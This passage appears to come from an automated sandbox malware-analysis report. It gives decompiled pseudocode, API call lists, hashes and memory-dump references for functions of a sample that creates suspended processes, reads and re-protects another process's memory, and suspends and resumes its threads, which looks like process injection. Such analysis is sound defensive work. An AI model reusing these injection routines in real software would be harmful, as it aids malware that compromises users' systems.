			}

0x00401815
0x00401821
0x00401824
0x00401829
0x0040182f
0x00401838
0x00401849
0x0040184d
0x00401851
0x00401857
0x0040185a
0x00401868
0x0040186f
0x00401872
0x0040187c
0x00401880
0x00401880
0x00401885
0x00401888
0x00401892
0x00401896
0x00401853
0x00401853
0x00401853
0x00401851
0x0040189c
0x0040189f
0x004018ab
0x004018b3

APIs

__EH_prolog.LIBCMT ref: 00401815
std::_Lockit::_Lockit.LIBCPMT ref: 00401824

Part of subcall function 00408C9D: __lock.LIBCMT ref: 00408CAE

int.LIBCPMT ref: 0040183B

Part of subcall function 00401FE7: std::_Lockit::_Lockit.LIBCPMT ref: 00401FF8

std::bad_exception::bad_exception.LIBCMT ref: 00401872
__CxxThrowException@8.LIBCMT ref: 00401880
std::_Facet_Register.LIBCPMT ref: 00401896

Strings

bad cast, xrefs: 0040186A

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prologRegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 3662787701-3145022300
Opcode ID: be809c22b83588e54f4aac52f786513ae583216be922af0bf0ad1a82cec4871f
Instruction ID: 6d6b22a5ad371972c969bb1a29afc40d9d2ef8e6925d414dbd93c8f5643422d8
Opcode Fuzzy Hash: be809c22b83588e54f4aac52f786513ae583216be922af0bf0ad1a82cec4871f
Instruction Fuzzy Hash: A911E0329001249BCB14FBE5D845AAEB774AF44718F10413FF611B72E2DF7CAA048BA9

Uniqueness

Uniqueness Score: -1,00%

Function 004018B4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E004018B4(void* __eflags) {
				void* _t22;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t45;

				E00432414(0x44ca34, _t45);
				_t1 = _t45 - 0x14; // -19
				L00408C9D(_t1, 0);
				_t40 =  *0x46ab44; // 0x324da0
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				 *((intOrPtr*)(_t45 - 0x10)) = _t40;
				_t43 = E00402709( *((intOrPtr*)(_t45 + 8)), L00401FE7(0x46b8ac));
				if(_t43 == 0) {
					if(_t40 == 0) {
						_push( *((intOrPtr*)(_t45 + 8)));
						_t7 = _t45 - 0x10; // -15
						_t22 = E0040268B(_t45); // executed
						if(_t22 == 0xffffffff) {
							_t8 = _t45 - 0x20; // -31
							L00431FEF(_t8, "bad cast");
							_t9 = _t45 - 0x20; // -31
							E004323B9(_t9, 0x467220);
						}
						_t43 =  *((intOrPtr*)(_t45 - 0x10));
						 *0x46ab44 = _t43;
						 *((intOrPtr*)( *_t43 + 4))();
						E004091E4(_t43);
					} else {
						_t43 = _t40;
					}
				}
				_t12 = _t45 - 0x14; // -19
				L00408CF9(_t12);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t43;
			}

0x004018b9
0x004018c5
0x004018c8
0x004018cd
0x004018d3
0x004018dc
0x004018ed
0x004018f1
0x004018f5
0x004018fb
0x004018fe
0x00401902
0x0040190c
0x00401913
0x00401916
0x00401920
0x00401924
0x00401924
0x00401929
0x0040192c
0x00401936
0x0040193a
0x004018f7
0x004018f7
0x004018f7
0x004018f5
0x00401940
0x00401943
0x0040194f
0x00401957

APIs

__EH_prolog.LIBCMT ref: 004018B9
std::_Lockit::_Lockit.LIBCPMT ref: 004018C8

Part of subcall function 00408C9D: __lock.LIBCMT ref: 00408CAE

int.LIBCPMT ref: 004018DF

Part of subcall function 00401FE7: std::_Lockit::_Lockit.LIBCPMT ref: 00401FF8

std::bad_exception::bad_exception.LIBCMT ref: 00401916
__CxxThrowException@8.LIBCMT ref: 00401924
std::_Facet_Register.LIBCPMT ref: 0040193A

Strings

bad cast, xrefs: 0040190E

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prologRegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 3662787701-3145022300
Opcode ID: ad62e3c09d503f749593ff9e31de766b997b56ee9847ebe16432fbd01acfba1f
Instruction ID: 12e1174923887d53862dafc6a48e4dc5b3c7ba5e561d226c7bf4d6e1d33916b5
Opcode Fuzzy Hash: ad62e3c09d503f749593ff9e31de766b997b56ee9847ebe16432fbd01acfba1f
Instruction Fuzzy Hash: E311C1329001159BCB00EBA5D955AAEB778AF44718F10012FF611B72D2DF7C9900CBA9

Uniqueness

Uniqueness Score: -1,00%

Function 00401A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401A10(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				int _t21;
				long _t26;
				long _t29;
				void* _t31;
				void* _t32;
				CHAR* _t34;

				_t32 = __edx;
				_t31 = __ecx;
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v92.cb = 0;
				memset( &(_v92.lpReserved), 0, 0x40);
				_t34 = E00402014(_a4);
				if(_t34 == 0) {
					_t29 = 8;
				} else {
					_push(0);
					_v92.cb = 0x44;
					E0040218A();
					_t21 = CreateProcessA(0, _t34, 0, 0, 0, 0x4000004, 0, 0,  &_v92,  &_v20); // executed
					_push(1);
					E0040218A();
					_t41 = _t21;
					if(_t21 == 0) {
						_t29 = GetLastError();
					} else {
						_t26 = E00403867( &_v20, _t31, _t32, _t41, _a8); // executed
						_t29 = _t26; // executed
						CloseHandle(_v20.hThread); // executed
						CloseHandle(_v20); // executed
					}
					E00401686(_t34);
				}
				return _t29;
			}

0x00401a10
0x00401a10
0x00401a1d
0x00401a23
0x00401a24
0x00401a27
0x00401a2d
0x00401a30
0x00401a40
0x00401a44
0x00401aab
0x00401a46
0x00401a46
0x00401a47
0x00401a4e
0x00401a67
0x00401a6d
0x00401a71
0x00401a76
0x00401a78
0x00401a9f
0x00401a7a
0x00401a80
0x00401a8e
0x00401a90
0x00401a95
0x00401a95
0x00401aa2
0x00401aa2
0x00401ab2

APIs

memset.NTDLL ref: 00401A30

Part of subcall function 00402014: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,0000007E,00000000,0000007E,00401A40,00000000,00000000,00000000,0000007E), ref: 00402025
Part of subcall function 00402014: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0040203F

Part of subcall function 0040218A: GetModuleHandleA.KERNEL32(KERNEL32.DLL,Wow64EnableWow64FsRedirection,00401A53,00000000,00000000,00000000,00000000,0000007E), ref: 0040219D
Part of subcall function 0040218A: GetProcAddress.KERNEL32(00000000), ref: 004021A4

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,00000000), ref: 00401A67
GetLastError.KERNEL32(00000001), ref: 00401A99

Part of subcall function 00403867: memset.NTDLL ref: 0040388A
Part of subcall function 00403867: Sleep.KERNELBASE(00000064,?,00000000,00000000,CCCCFEEB,00000000,00000000,?,00000004,?,00000000,00000000,00000000,00000000,00000000), ref: 0040390C
Part of subcall function 00403867: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00403929
Part of subcall function 00403867: GetLastError.KERNEL32(00000000,00000000,?,00000004,?,00000000,00000000,00000000,00000000,00000000), ref: 00403970

CloseHandle.KERNELBASE(0000007E), ref: 00401A90
CloseHandle.KERNELBASE(00000000), ref: 00401A95

Strings

D, xrefs: 00401A47

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Handle$CloseEnvironmentErrorExpandLastProcessStringsmemset$AddressCodeCreateExitModuleProcSleep
String ID: D
API String ID: 3099805962-2746444292
Opcode ID: 9b2afa1a86707d24485986b82907e629571436558018dcd3333f65c0e80eb3df
Instruction ID: 9e723e15aaefc8d6d8cbe4922ae0fc0b050d80318e722ae06b94e75ef584d548
Opcode Fuzzy Hash: 9b2afa1a86707d24485986b82907e629571436558018dcd3333f65c0e80eb3df
Instruction Fuzzy Hash: FC118272A012287BDB11ABE5CC49EEFBF6CEF45754F000437F604BA191D6B859048AE5

Uniqueness

Uniqueness Score: -1,00%

Function 0040213C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040213C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;

				_t9 =  *0x40648c;
				_v8 = _v8 & 0x00000000;
				if(_t9 != 0) {
					L2:
					if(_a4 != 0) {
						_t11 =  *_t9(_a4,  &_v8); // executed
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t9 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "IsWow64Process");
				 *0x40648c = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x00402140
0x00402145
0x0040214b
0x0040216d
0x00402171
0x0040217a
0x0040217e
0x00402180
0x00402180
0x0040217e
0x00402183
0x00402187
0x00402187
0x0040215e
0x00402166
0x0040216b
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00401C85,000000FF), ref: 00402157
GetProcAddress.KERNEL32(00000000,?,?,00401C85,000000FF), ref: 0040215E
IsWow64Process.KERNELBASE(00000000,00000000,?,?,00401C85,000000FF), ref: 0040217A

Strings

IsWow64Process, xrefs: 0040214D
KERNEL32.DLL, xrefs: 00402152
6V4w, xrefs: 00402166

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProcessWow64
String ID: 6V4w$IsWow64Process$KERNEL32.DLL
API String ID: 1818662866-1776546807
Opcode ID: 84b411c834a7f2ac203351759caf2f7c5be458a1b4329db91137cb7eaefb18a8
Instruction ID: bbc9c5c06333510f43cbdbcc90b103ad05492593dc59bffc065457754130a6b6
Opcode Fuzzy Hash: 84b411c834a7f2ac203351759caf2f7c5be458a1b4329db91137cb7eaefb18a8
Instruction Fuzzy Hash: 28F01270A00206BFDB10DFA5DE89B5E76B89B10785F144076A905F61D0E7B4DA04DB5C

Uniqueness

Uniqueness Score: -1,00%

Function 00403867, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00403867(void** __eax, void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _v572;
				void _v752;
				char _v756;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t39;
				void* _t43;
				long _t45;
				intOrPtr _t52;
				long _t53;
				void* _t54;
				void* _t55;
				void** _t57;

				_t55 = __edx;
				_t54 = __ecx;
				_t57 = __eax;
				_v756 = 0;
				memset( &_v752, 0, 0x2c8);
				_t56 =  *_t57;
				_v16 = 0xccccfeeb;
				_v12 = 0;
				_t35 = E0040213C(_t54,  *_t57); // executed
				if(_t35 == 0) {
					if(( *0x406464 & 0x00000001) == 0) {
						goto L2;
					} else {
						_t53 = E0040372F(_t54, _t55, _t57, _a4);
						goto L11;
					}
				} else {
					_v12 = 0x10;
					L2:
					_v756 = 0x10007;
					_t36 = E004030AD( *_t57); // executed
					_t52 = _t36;
					_v28 = _t52;
					_t39 = E00402BE5(_t56, _t52,  &_v20, 4,  &_v24); // executed
					if(_t39 == 0 || _v24 != 4) {
						L12:
						_t53 = GetLastError();
					} else {
						_t43 = E00403052(_t54, _t56, _t52,  &_v16); // executed
						if(_t43 == 0) {
							goto L12;
						} else {
							_v8 = 0x13ed;
							do {
								_push(_t57[1]);
								E00402FE4(); // executed
								Sleep("true"); // executed
								_push(_t57[1]);
								E0040301B(); // executed
								if(_t43 == 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									GetExitCodeProcess( *_t57,  &_v32);
								}
								_v8 = _v8 - 0x64;
								_t43 = E00402BC4(_t57[1],  &_v756);
							} while (_v8 > 0 && _v572 != _t52);
							_t45 = E004032D4(_t57, _a4, _v12); // executed
							_t53 = _t45;
							E00403052(_t54, _t56, _v28,  &_v20); // executed
							L11:
							if(_t53 == 0xffffffff) {
								goto L12;
							}
						}
					}
				}
				_push(_t57[1]);
				E00402FE4(); // executed
				return _t53;
			}

0x00403867
0x00403867
0x0040387a
0x00403884
0x0040388a
0x0040388f
0x00403895
0x0040389c
0x0040389f
0x004038a6
0x00403990
0x00000000
0x00403996
0x0040399e
0x00000000
0x0040399e
0x004038ac
0x004038ac
0x004038b3
0x004038b5
0x004038bf
0x004038c4
0x004038d2
0x004038d5
0x004038dc
0x00403970
0x00403976
0x004038ec
0x004038f2
0x004038f9
0x00000000
0x004038fb
0x004038fb
0x00403902
0x00403902
0x00403905
0x0040390c
0x00403912
0x00403915
0x0040391d
0x0040391f
0x00403929
0x00403929
0x0040392f
0x0040393d
0x00403942
0x00403957
0x0040395c
0x00403966
0x0040396b
0x0040396e
0x00000000
0x00000000
0x0040396e
0x004038f9
0x004038dc
0x00403978
0x0040397b
0x00403986

APIs

memset.NTDLL ref: 0040388A

Part of subcall function 0040213C: GetModuleHandleA.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00401C85,000000FF), ref: 00402157
Part of subcall function 0040213C: GetProcAddress.KERNEL32(00000000,?,?,00401C85,000000FF), ref: 0040215E
Part of subcall function 0040213C: IsWow64Process.KERNELBASE(00000000,00000000,?,?,00401C85,000000FF), ref: 0040217A

GetLastError.KERNEL32(00000000,00000000,?,00000004,?,00000000,00000000,00000000,00000000,00000000), ref: 00403970

Part of subcall function 00402BE5: NtReadVirtualMemory.NTDLL(?,?,?,?,,+@,00000000,?,00402B2C,00000000,?,00000000,000001E8,00000000,?,?,00000000), ref: 00402C03

Part of subcall function 00403052: VirtualProtectEx.KERNELBASE(00000000,?,00000004,00000040,00000000,00000000,00000000,?,?,?,004038F7,00000000,00000000,CCCCFEEB,00000000,00000000), ref: 0040306F
Part of subcall function 00403052: VirtualProtectEx.KERNELBASE(00000000,?,00000004,00000000,00000000,00000000,?,00000004,00000004,00000000,?,?,?,004038F7,00000000,00000000), ref: 004030A3

Part of subcall function 00402FE4: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ResumeThread,00403980,?), ref: 00402FF7
Part of subcall function 00402FE4: GetProcAddress.KERNEL32(00000000), ref: 00402FFE

Sleep.KERNELBASE(00000064,?,00000000,00000000,CCCCFEEB,00000000,00000000,?,00000004,?,00000000,00000000,00000000,00000000,00000000), ref: 0040390C

Part of subcall function 0040301B: GetModuleHandleA.KERNEL32(KERNEL32.DLL,SuspendThread,0040391A,?), ref: 0040302E
Part of subcall function 0040301B: GetProcAddress.KERNEL32(00000000), ref: 00403035

GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00403929

Strings

d, xrefs: 0040392F

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVirtual$ProcessProtect$CodeErrorExitLastMemoryReadSleepWow64memset
String ID: d
API String ID: 991288346-2564639436
Opcode ID: 6fdb0a5b5dd132e406726dcb9310d0eebbb1195edafb915e4d0be4b1f152117e
Instruction ID: 077d47f1a8ef7d73e66651dc3ea1ae14c7c4e5ecd49f652097f11467fee8388e
Opcode Fuzzy Hash: 6fdb0a5b5dd132e406726dcb9310d0eebbb1195edafb915e4d0be4b1f152117e
Instruction Fuzzy Hash: 6C318E71900209AEDB11AFA1CD85EAFBABCAF04345F00447AF511B12D1C7B88E44CB69

Uniqueness

Uniqueness Score: -1,00%

Function 004021B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004021B8(void* __eax, void* __ebx, void* __ecx, void* _a4) {
				CHAR* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void _v20;
				void* __edi;
				void* _t24;
				long _t25;
				int _t29;
				long _t33;
				void* _t36;

				_t35 = __ecx;
				_t36 = __eax;
				_v12 = 0;
				if(E00402B3D(__ecx, __eax,  &_v8, 0) != 0) {
					L11:
					return _v12;
				}
				if(E00402DD7(_t36, _a4, 0) == 0) {
					L10:
					E00401686(_v8);
					goto L11;
				}
				_t33 = E00402EE1(_t36, _t35, _t19 - _t36);
				if(_t33 != 0) {
					_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_a4 = _t24;
					if(_t24 != 0xffffffff) {
						_t25 = SetFilePointer(_t24, _t33, 0, 0); // executed
						if(_t25 == _t33) {
							_t29 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
							if(_t29 != 0 && _v16 == 4) {
								_v12 = _v20 + _t36;
							}
						}
						CloseHandle(_a4); // executed
					}
				}
				goto L10;
			}

0x004021b8
0x004021c0
0x004021ca
0x004021d4
0x0040225f
0x00402265
0x00402265
0x004021e5
0x00402257
0x0040225a
0x00000000
0x0040225a
0x004021f2
0x004021f6
0x0040220b
0x00402214
0x00402217
0x0040221d
0x00402225
0x00402235
0x0040223d
0x0040224a
0x0040224a
0x0040223d
0x00402250
0x00402250
0x00402217
0x00000000

APIs

Part of subcall function 00402B3D: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,7734DAA3,?,?,00402098,?,00000001,?,?,?,00401C7E), ref: 00402B63

Part of subcall function 00402DD7: lstrcmpA.KERNEL32(?,0000007F,00000000,00000000,00000000), ref: 00402E84

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040220B
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,\9@,004031D1,LdrLoadDll,?,?,?,00000000,00000000,00000000), ref: 0040221D
ReadFile.KERNELBASE(004031D1,?,00000004,?,00000000), ref: 00402235
CloseHandle.KERNELBASE(004031D1), ref: 00402250

Strings

\9@, xrefs: 004021B8

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerReadlstrcmp
String ID: \9@
API String ID: 3110218675-3804218092
Opcode ID: 39b940952879cab0570fdeb47c36daf8a0cb64ed3a271ccec19460b1eb8c5d40
Instruction ID: 47c8e1ea9c591fd0233312c6c8ec3a9565d94d1dfceb42f9326a28f07d67f758
Opcode Fuzzy Hash: 39b940952879cab0570fdeb47c36daf8a0cb64ed3a271ccec19460b1eb8c5d40
Instruction Fuzzy Hash: 45113071900119BBDB20ABA5CE49EAFBE6DEF41754F10407AF604F51E0D7749E40CAA8

Uniqueness

Uniqueness Score: -1,00%

Function 00401DEE, Relevance: 7.6, APIs: 5, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401DEE(void* __ecx, void* _a4, void** _a8, long* _a12) {
				long _v8;
				void* _t12;
				void* _t29;
				long _t32;
				long _t34;

				_t29 = 0; // executed
				_t12 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_a4 = _t12;
				if(_t12 == 0xffffffff) {
					L8:
					_t32 = GetLastError();
					L9:
					if(_a4 != 0xffffffff) {
						CloseHandle(_a4);
					}
					if(_t29 != 0 && _t32 != 0) {
						E00401686(_t29);
					}
					return _t32;
				}
				_t34 = GetFileSize(_t12, 0);
				if(_t34 != 0) {
					_t3 = _t34 + 1; // 0x1
					_t29 = E00401671(_t3);
					if(_t29 == 0 || ReadFile(_a4, _t29, _t34,  &_v8, 0) == 0) {
						goto L8;
					} else {
						if(_t34 == _v8) {
							 *_a8 = _t29;
							 *((char*)(_t29 + _t34)) = 0;
							 *_a12 = _t34;
							_t32 = 0;
						} else {
							_t32 = 0x1e;
						}
						goto L9;
					}
				}
				_t32 = 0xe8;
				goto L9;
			}

0x00401e0a
0x00401e0c
0x00401e15
0x00401e18
0x00401e6d
0x00401e73
0x00401e75
0x00401e79
0x00401e7e
0x00401e7e
0x00401e86
0x00401e8d
0x00401e8d
0x00401e98
0x00401e98
0x00401e22
0x00401e26
0x00401e2f
0x00401e38
0x00401e3c
0x00000000
0x00401e52
0x00401e55
0x00401e5f
0x00401e64
0x00401e67
0x00401e69
0x00401e57
0x00401e59
0x00401e59
0x00000000
0x00401e55
0x00401e3c
0x00401e28
0x00000000

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E0C
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040122D,00000000,?,00000000,?,?), ref: 00401E1C
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00401E48
GetLastError.KERNEL32(?,?,?,0040122D,00000000,?,00000000,?,?), ref: 00401E6D
CloseHandle.KERNEL32(000000FF), ref: 00401E7E

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 2472d5cff51c3a778082f727b240224479e2b8805d956f389d2fe568a9108a37
Instruction ID: 0c694e74047beede283a2fdf53ae76d7b2f176969d46fe33abdfe2a164af5111
Opcode Fuzzy Hash: 2472d5cff51c3a778082f727b240224479e2b8805d956f389d2fe568a9108a37
Instruction Fuzzy Hash: E511A272100215BFDB206F64CC88EAF7AA9EB053A0F554536FD15BB2E0C6749C408AE8

Uniqueness

Uniqueness Score: -1,00%

Function 0040162B, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				int _t4;
				void* _t6;
				int _t7;

				_t7 = 0;
				 *0x40646c = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x400100, 0); // executed
				_t8 = _t2;
				 *0x406458 = _t2;
				if(_t2 != 0) {
					GetCommandLineW(); // executed
					_t4 = E00401B21(_t6, _t8); // executed
					_t7 = _t4; // executed
					HeapDestroy( *0x406458); // executed
				}
				ExitProcess(_t7);
			}

0x0040162c
0x0040163c
0x00401641
0x00401647
0x00401649
0x0040164e
0x00401650
0x00401656
0x00401661
0x00401663
0x00401663
0x0040166a

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0040162F
HeapCreate.KERNELBASE(00000000,00400100,00000000), ref: 00401641
GetCommandLineW.KERNEL32 ref: 00401650

Part of subcall function 00401B21: GetModuleHandleA.KERNEL32 ref: 00401BF2
Part of subcall function 00401B21: MessageBoxA.USER32(00000000,00000000,00000000,00000010), ref: 00401C1B

HeapDestroy.KERNELBASE ref: 00401663
ExitProcess.KERNEL32 ref: 0040166A

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: HandleHeapModule$CommandCreateDestroyExitLineMessageProcess
String ID:
API String ID: 1730100301-0
Opcode ID: 5e8175bdda30e6786cd17463d584d8d568bc3c6d6f6e8994e2aea03eb7b57719
Instruction ID: da040f5f181ba2a695e223ccbd0b97d8f577a9e9d3de4547638e56b1f120b925
Opcode Fuzzy Hash: 5e8175bdda30e6786cd17463d584d8d568bc3c6d6f6e8994e2aea03eb7b57719
Instruction Fuzzy Hash: 9AE09231802A20ABC7112BB1AE4C94F3E79EE093913154436F406F2160DA795854CFED

Uniqueness

Uniqueness Score: -1,00%

Function 0043FA88, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043FA88(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t4 = E0044963F(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00439530(__ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					if( *_t7 != 0xe06d7363 ||  *((intOrPtr*)(_t7 + 0x10)) != 3) {
						L8:
						return 0;
					} else {
						_t9 =  *((intOrPtr*)(_t7 + 0x14));
						if(_t9 == 0x19930520 || _t9 == 0x19930521 || _t9 == 0x19930522 || _t9 == 0x1994000) {
							L0043BBB8();
							asm("int3");
							E00437BC3(0x43faaf); // executed
							return 0;
						} else {
							goto L8;
						}
					}
				} else {
					return _t4;
				}
			}

0x0043fa96
0x0043faa0
0x0043faa4
0x0043faa5
0x0043faa6
0x0043faa7
0x0043faa8
0x0043faa9
0x0043faae
0x0043fab5
0x0043fabd
0x0043fae4
0x0043fae7
0x0043fac5
0x0043fac5
0x0043facd
0x0043faea
0x0043faef
0x0043faf5
0x0043fafd
0x00000000
0x00000000
0x00000000
0x0043facd
0x0043faa2
0x0043faa3
0x0043faa3

APIs

__controlfp_s.LIBCMT ref: 0043FA96

Part of subcall function 0044963F: __control87.LIBCMT ref: 00449663

__invoke_watson.LIBCMT ref: 0043FAA9

Strings

csm, xrefs: 0043FAB7

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __control87__controlfp_s__invoke_watson
String ID: csm
API String ID: 1371525046-945121583
Opcode ID: 00cc545632e0643678d47cbf44239f45f64b7399f43a866a2b91aaf045deb8a1
Instruction ID: ae2976b977fb6831f5802f62b71d78b2c88089df93dc5f6f750f5115fc68ba59
Opcode Fuzzy Hash: 00cc545632e0643678d47cbf44239f45f64b7399f43a866a2b91aaf045deb8a1
Instruction Fuzzy Hash: 06F024229002015A8E38B92A6849E5B734D9F38318F542427F90CCA712DB98DE88C0DE

Uniqueness

Uniqueness Score: -1,00%

Function 004011D3, Relevance: 4.6, APIs: 3, Instructions: 51
memorystringCOMMON

Download Yara Rule

